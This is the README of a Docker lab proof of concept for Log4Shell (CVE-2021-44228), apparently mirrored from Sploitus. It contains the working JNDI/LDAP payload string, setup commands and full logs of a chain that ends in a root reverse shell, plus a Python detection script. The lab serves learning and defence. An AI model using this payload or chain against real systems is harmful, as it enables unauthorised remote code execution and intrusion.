## https://sploitus.com/exploit?id=54FE5E76-EAF4-5D84-B37F-06F12A6AFF71
# Self-contained lab environment PoC that runs a reverse-shell with Log4Shell (CVE-2021-44228)

This is a self-contained lab environment that runs the exploit safely, all from docker compose.

The affected versions are **Apache Log4j <=2.0–2.14.1** and the CVE is tracked as **CVE-2021-44228** (CVSS score: 10.0).

### Do patch Apache Log4j to version 2.16+ asap !!!

## Prerequisites

This code requires Docker and Docker Compose.

## Description
`Dockerfile` and `docker-compose.yml` files are self-explanatory to build and start the lab environment.

The victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server) is built from the [Spring Initializr](https://start.spring.io) demo project and includes the vulnerable Log4j 2.14.1 through [spring-boot-starter-log4j2 2.6.1](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/build.gradle#L19).

The vulnerable code is located inside [DemoApplication.java](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/src/main/java/com/example/demo/DemoApplication.java#L29).

[Remote Code Execution](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/rce-server/src/ReverseShell.java#L8) is served by the [rce-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/rce-server).

The intermediate [LDAP server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/ldap-server) is based on [Java Unmarshaller Security - Turning your data into code execution](https://github.com/mbechler/marshalsec).

The attack vector is sent from [this script](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/attack-vector/attack-vector.sh#L13) to set up a connection to the [reverse-shell](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) server.

The [reverse-shell server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) waits for a connection and sends a [command example](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/reverse-shell/reverse-shell.sh#L3) `echo $(whoami)` through the reverse shell, which is executed on the victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server).


## Usage:

```bash
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
```

```
ldap-server       | Listening on 0.0.0.0:1389
```
LDAP server ready and listening.

```
reverse-shell     | listening on [::]:4242 ...
```
Reverse-shell server ready and listening.

```
log4shell-server  |
log4shell-server  |   .   ____          _            __ _ _
log4shell-server  |  /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
log4shell-server  | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server  |  \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
log4shell-server  |   '  |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server  |  =========|_|==============|___/=/_/_/_/
log4shell-server  |  :: Spring Boot ::                (v2.6.1)
log4shell-server  |
log4shell-server  | 2021-12-18 12:31:37.695  INFO 1 --- [           main] c.e.d.DemoApplication                    : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server  | 2021-12-18 12:31:37.739  INFO 1 --- [           main] c.e.d.DemoApplication                    : No active profile set, falling back to default profiles: default
log4shell-server  | 2021-12-18 12:31:42.337  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat initialized with port(s): 8080 (http)
log4shell-server  | 2021-12-18 12:31:42.439  INFO 1 --- [           main] o.a.c.c.StandardService                  : Starting service [Tomcat]
log4shell-server  | 2021-12-18 12:31:42.440  INFO 1 --- [           main] o.a.c.c.StandardEngine                   : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server  | 2021-12-18 12:31:42.717  INFO 1 --- [           main] o.a.c.c.C.[.[.[/]                        : Initializing Spring embedded WebApplicationContext
log4shell-server  | 2021-12-18 12:31:42.718  INFO 1 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server  | 2021-12-18 12:31:44.660  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''
```
Vulnerable server ready and listening.

```
attack-vector     | 👌 log4shell-server:8080 is listening!
attack-vector     | 🚀 Sending attack vector ...
```
The attack server waits for the connection and sends the attack vector.

```
log4shell-server  | 2021-12-18 12:31:44.740  INFO 1 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/]                        : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.112  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 2 ms
ldap-server       | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server        | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
```
The vulnerable server handles the request and logs it; the LDAP server answers the resulting lookup with a reference to the RCE server, which then serves `ReverseShell.class`.

```
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell     | 👻 Hello from the log4shell-server! We are root.
reverse-shell     | listening on [::]:4242 ...
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
```
The RCE is executed and the victim server opens the reverse shell, so the reverse-shell server is able to execute remote commands.

```
log4shell-server  | 2021-12-18 12:31:45.187  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello  param:name: ReverseShell@22fb868
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:host: log4shell-server:8080
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:user-agent: curl/7.80.0
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:accept: */*
```
The victim server logs the attack vector request.

```
attack-vector     | 🔥 Server returned:
attack-vector     | > HTTP/1.1 200
attack-vector     | > Content-Type: text/plain;charset=UTF-8
attack-vector     | > Content-Length: 52
attack-vector     | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector     | >
attack-vector     | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector     | Attack should be successfull, have a nice day!
```
The attack vector logs the response and leaves the party.
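The lab output above leaves two traces a defender can search for: the literal `${jndi:...}` string where it is echoed back, and a Java HTTP client fetching a `.class` file. The following is an added detection example, not code from this repository; the rule names are hypothetical, the last sample line is constructed, and the patterns match only the literal forms shown in this lab output.

```python
import re

# Lines taken from the lab output above (column padding trimmed),
# plus one constructed benign line at the end.
SAMPLE_LOG = [
    'rce-server | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] '
    '"GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"',
    'log4shell-server | 2021-12-18 12:31:45.187  INFO 1 --- [nio-8080-exec-1] '
    'Demo : GET /hello  param:name: ReverseShell@22fb868',
    'attack-vector | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!',
    'proxy | 10.0.0.7 - - [18/Dec/2021:12:40:02 +0000] '
    '"GET /index.html HTTP/1.1" 200 512 "" "curl/7.80.0"',  # constructed
]

# ${jndi:<scheme>://<host>[:port]/...} in its literal form.
JNDI_RE = re.compile(
    r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?',
    re.IGNORECASE)

# Combined-log-format GET for a .class file made by a Java HTTP client.
CLASS_FETCH_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+\.class) HTTP/[\d.]+" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>Java/[^"]+)"')


def scan(lines):
    """Return (line_no, rule, detail) for every finding, in input order."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = JNDI_RE.search(line)
        if m:
            port = m.group('port') or 'default'
            detail = f"{m.group('scheme').lower()}://{m.group('host')}:{port}"
            findings.append((no, 'jndi-lookup', detail))
        m = CLASS_FETCH_RE.search(line)
        if m:
            detail = f"{m.group('src')} {m.group('path')} {m.group('ua')}"
            findings.append((no, 'java-class-fetch', detail))
    return findings


if __name__ == '__main__':
    # Line 2 (the victim's own log) yields nothing: Log4j has already replaced
    # the lookup with the resolved object, so the string is gone from that log.
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The victim's application log is the one place the lookup string does not survive, so egress, proxy and downstream web-server logs are where these rules are useful.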

## Disclaimer
This repository is only about learning from the vulnerability.

The project is not intended to be and cannot be used as a malicious exploit of CVE-2021-44228 without the consent of the victim server's owner.

**Any usage for malicious activity is prohibited and punished by severe laws.**

